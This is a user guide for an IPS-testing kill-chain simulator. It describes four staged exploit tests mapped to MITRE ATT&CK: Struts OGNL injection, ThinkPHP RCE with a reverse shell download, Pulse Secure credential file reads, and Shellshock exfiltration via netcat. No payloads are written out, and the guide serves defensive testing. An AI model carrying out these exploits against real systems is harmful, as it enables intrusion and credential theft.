MITRE ATT&CK Simulator — Complete Guide

Understand how the kill chain simulator works and how to interpret the results.

What Is a Kill Chain?

Real-world cyberattacks follow a sequence of stages. If your security controls break the chain at any point, the attacker fails. The simulator executes four stages sequentially, mapped to the MITRE ATT&CK framework.

💡 Key Concept: Unlike independent NGFW tests, the kill chain runs tests sequentially — each stage depends on the previous one succeeding.

How to Use

  1. Navigate to MITRE ATT&CK from the sidebar.
  2. Review the four stage cards.
  3. Click Execute Kill Chain.
  4. Watch the console as each stage runs with a 1.2s delay.
  5. The summary shows how many stages were blocked out of 4.

Kill Chain Stages

Stage 1 — Initial Access (T1190)

Sends an Apache Struts RCE payload (CVE-2017-5638) with malicious OGNL injection in the HTTP Content-Type header. Tests IPS detection of header-based remote code execution exploits.

Stage 2 — Execution (T1059.004)

Sends a ThinkPHP RCE exploit (CVE-2018-20062) with a reverse shell download command in the URL path. Tests IPS detection of command execution via vulnerable web frameworks.

Stage 3 — Credential Access (T1003.001)

Exploits Pulse Secure VPN (CVE-2019-11510) arbitrary file reading to access cached cleartext password databases. Tests IPS detection of path traversal-based credential theft.

Stage 4 — Exfiltration (T1048.003)

Injects a Shellshock payload (CVE-2014-6271) in HTTP headers to exfiltrate system files via netcat. Tests IPS detection of Bash environment variable injection attacks.

Interpreting Results

  • 4/4 blocked — Excellent. Kill chain broken at every stage.
  • 3/4 blocked — One gap. Identify which technique bypassed controls.
  • 1-2/4 blocked — Multiple gaps. Review IPS signatures and policies.
  • 0/4 blocked — Check SSL Decryption is enabled and IPS is active.
Open MITRE ATT&CK Simulator →